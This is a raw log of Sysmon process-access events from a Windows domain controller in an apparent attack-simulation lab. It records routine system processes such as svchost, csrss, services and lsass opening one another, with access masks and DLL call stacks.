13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F704-00000000A301}2256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F404-00000000A301}2964C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F404-00000000A301}2964C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.508{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.493{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.493{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.493{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.493{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 